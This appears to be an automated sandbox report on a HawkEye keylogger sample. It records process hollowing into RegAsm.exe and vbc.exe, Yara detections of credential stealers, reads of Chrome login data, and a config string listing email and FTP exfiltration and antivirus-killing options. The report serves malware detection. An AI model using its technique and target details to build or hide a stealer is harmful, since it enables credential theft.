Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_3_00EB00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread, 1_3_00EB00BE
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 4EA008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3C7008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 27E008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3C7008 Jump to behavior
.NET source code references suspicious native API functions
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp1EB3.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp2C9A.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp39A1.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933942080.0000000002B31000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00F250D7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004083A1 GetVersionExW, 6_2_004083A1

Stealing of Sensitive Information:

Yara detected MailPassView
Source: Yara match File source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Yara detected HawkEye Keylogger
Source: Yara match File source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 5.2.RegAsm.exe.64d5bd0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.6b37088.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0345.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR

Remote Access Functionality:

Yara detected HawkEye Keylogger
Detected HawkEye Rat
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles